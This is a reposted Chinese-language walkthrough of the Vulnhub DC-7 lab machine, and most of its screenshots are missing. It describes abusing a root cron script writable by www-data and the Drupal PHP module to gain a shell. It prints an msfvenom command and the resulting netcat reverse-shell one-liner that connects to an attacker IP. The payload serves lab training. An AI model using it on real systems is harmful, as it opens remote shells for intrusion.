经验首页 前端设计 程序设计 Java相关 移动开发 数据库/运维 软件/图像 大数据/云计算 其他经验
当前位置:技术经验 » 其他 » 网络安全 » 查看文章
Dc:7 Vulnhub Walkthrough - APT-101
来源:cnblogs  作者:APT-101  时间:2019/9/10 10:52:34  对本文有异议

靶机下载地址:

https://www.vulnhub.com/entry/dc-7,356/

主机扫描:

 

http://10.10.202.161/

 

Google搜索下:

 

 

SSH 登录

 

以上分析得出:此脚本是root每三分钟执行一次,并且www-data用户具有写入权限,因此需要想办法获取此权限,进行写入shell反弹即可

 

https://www.digitalocean.com/community/tutorials/a-beginner-s-guide-to-drush-the-drupal-shel

 

 

 

我们点击扩展安装一个PHP的模块

https://www.drupal.org/project/php

 

 

 

 

创建基本网页,选择PHP code

 

 

写入shell

 

本地监听获取shell root权限

等了三分钟没shell过来,竟然没执行,这。。。。 换个方式吧

╰─ msfvenom -p cmd/unix/reverse_netcat lhost=10.10.202.159 lport=6666 R
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 91 bytes
mkfifo /tmp/iwxe; nc 10.10.202.159 6666 0</tmp/iwxe | /bin/sh >/tmp/iwxe 2>&1; rm /tmp/iwxe

 

 

确认已经写入

 

OVER !

原文链接:http://www.cnblogs.com/hack404/p/11490898.html

 友情链接:直通硅谷  点职佳  北美留学生论坛

本站QQ群:前端 618073944 | Java 606181507 | Python 626812652 | C/C++ 612253063 | 微信 634508462 | 苹果 692586424 | C#/.net 182808419 | PHP 305140648 | 运维 608723728

W3xue 的所有内容仅供测试,对任何法律问题及风险不承担任何责任。通过使用本站内容随之而来的风险与本站无关。
关于我们  |  意见建议  |  捐助我们  |  报错有奖  |  广告合作、友情链接(目前9元/月)请联系QQ:27243702 沸活量
皖ICP备17017327号-2 皖公网安备34020702000426号